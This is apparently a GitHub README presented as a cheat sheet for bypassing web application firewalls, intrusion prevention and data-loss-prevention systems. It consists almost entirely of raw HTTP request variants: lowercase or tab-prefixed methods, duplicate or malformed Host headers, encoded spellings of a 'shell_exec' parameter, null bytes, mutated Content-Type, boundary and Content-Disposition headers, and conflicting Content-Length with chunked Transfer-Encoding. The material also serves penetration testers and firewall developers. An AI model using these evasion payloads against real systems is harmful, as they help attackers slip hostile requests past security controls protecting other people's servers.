└── README.md /README.md: -------------------------------------------------------------------------------- 1 | # WAF/IPS/DLP bypass Cheat Sheet 2 | Another way to bypass 3 | 4 | **Add \r\n before the first line HTTP request** 5 | 6 | ``` 7 | 8 | GET /login HTTP/1.1 9 | Host: favoritewaf.com 10 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 11 | ``` 12 | 13 | 14 | **Writing the method with a lowercase (Apache)** 15 | ``` 16 | get /login HTTP/1.1 17 | Host: favoritewaf.com 18 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 19 | ``` 20 | 21 | **Tabs before the method (IIS)** 22 | ``` 23 | GET /login.php HTTP/1.1 24 | Host: favoritewaf.com 25 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 26 | ``` 27 | 28 | **GET /login?shell_exec HTTP/1.1** 29 | ``` 30 | GET /login?shell.exec HTTP/1.1 31 | GET /login?shell[exec HTTP/1.1 32 | GET /login?shell%5bexec HTTP/1.1 33 | GET /login?shell%2eexec HTTP/1.1 34 | GET /login?shell%5fexec HTTP/1.1 35 | GET /login?shell%20exec HTTP/1.1 36 | ``` 37 | 38 | **GET /login.php?pam_param=test3** 39 | ``` 40 | GET /login.php?pam_param=test1&pam[param=test2&pam%5bparam=test3 41 | ``` 42 | 43 | **GET /login.php?hello=world HTTP/1.1** 44 | ``` 45 | GET /login.php?hello%00another_text=world HTTP/1.1 46 | ``` 47 | 48 | **HTTP Request - absoluteURI** 49 | ``` 50 | GET http://localhost/login.php HTTP/1.1 51 | Host: favoritewaf.com 52 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 53 | ``` 54 | 55 | **Double host header** 56 | ``` 57 | GET /login.php HTTP/1.1 58 | Host: favoritewaf.com 59 | Host: localhost 60 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 61 | ``` 62 | 63 | **Host with lowercase** 64 | ``` 65 | GET /login.php HTTP/1.1 66 | host: favoritewaf.com 67 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 68 | ``` 69 | 70 | **Host without space** 71 | ``` 72 | GET /login.php HTTP/1.1 73 | Host:favoritewaf.com 74 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 75 | ``` 76 | **Host with tab** 77 | ``` 78 | GET /login.php HTTP/1.1 79 | Host: favoritewaf.com 80 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 81 | ``` 82 | **Host with addition symbols** 83 | 84 | / 85 | : 86 | \x00 87 | \x20 88 | \x09 89 | \xad (IIS) 90 | 91 | Example: 92 | ``` 93 | GET /login.php HTTP/1.1 94 | Host: favoritewaf.com:12345 95 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 96 | ``` 97 | 98 | ``` 99 | GET /login.php HTTP/1.1 100 | Host: favoritewaf.com ignored.text 101 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 102 | ``` 103 | 104 | **Content-Type with another text** 105 | ``` 106 | POST /login.php HTTP/1.1 107 | Host: favoritewaf.com 108 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 109 | Content-Type: application/another-text/+++x-www-form-urlencoded 110 | 111 | hello=world 112 | ``` 113 | 114 | **HTTP request with incorrect Content-Length (more data than specified)** 115 | ``` 116 | GET /login.php HTTP/1.1 117 | Host: favoritewaf.com 118 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 119 | Content-Length: 1 120 | 121 | AAAAAAAA 122 | ``` 123 | 124 | **Double Content-Type** 125 | ``` 126 | Content-Type: multipart/form-data; boundary=ZZZ 127 | Content-Type: multipart/form-data; boundary=AAA 128 | ``` 129 | 130 | **Content-Disposition mutation** 131 | ``` 132 | GET /login.php HTTP/1.1 133 | Host: favoritewaf.com 134 | User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT) 135 | Accept-Language: en-us 136 | Accept-Encoding: gzip, deflate 137 | Connection: Keep-Alive 138 | Content-Type: multipart/form-data; boundary=--------1218108630 139 | 140 | ----------1218108630 141 | Content-Disposition: form-data; name="hello" 142 | 143 | world 144 | ----------1218108630-- 145 | ``` 146 | 147 | ``` 148 | Content-Disposition: form-data; name="hello" 149 | Content-Disposition: form-data; name="hello 150 | Content-Disposition: form-data; name="hello"world" 151 | Content-Disposition: attachment; name="hello" 152 | ``` 153 | 154 | 155 | ``` 156 | Content-Type: multipart/form-data; boundary=x 157 | 158 | 159 | --x 160 | Content-Disposition: 161 | test1; 162 | --x 163 | test2; 164 | --x-- 165 | test3; 166 | name="hello" 167 | 168 | world 169 | ``` 170 | **Boundary mutation** 171 | **PHP** 172 | 173 | ``` 174 | Content-Type: multipart/form-data; myfavoriteboundaryis=X; boundary=Hello; 175 | == 176 | Content-Type: multipart/form-data; boundary=X; 177 | ``` 178 | 179 | 180 | **Nullbyte** 181 | ``` 182 | Content-Type: multipart/form-data; boundary=HELLO\x00XXXXXXXXX 183 | == 184 | Content-Type: multipart/form-data; boundary=HELLO 185 | ``` 186 | 187 | **Ignored Content-Length** 188 | ``` 189 | Content-Type: application/x-www-form-urlencoded 190 | Content-Length: 11 191 | 192 | hello=world 193 | ``` 194 | 195 | == 196 | ``` 197 | Content-Length: 22 198 | Transfer-Encoding: chunked 199 | 200 | 0B 201 | hello=world 202 | 0 203 | 204 | ``` 205 | 206 | == 207 | ``` 208 | Content-Type: application/x-www-form-urlencoded 209 | Content-Length: 0 210 | Transfer-Encoding: chunked 211 | 212 | 3 213 | hel 214 | 3 215 | lo= 216 | 3 217 | wor 218 | 2 219 | ld 220 | 0 221 | ``` 222 | --------------------------------------------------------------------------------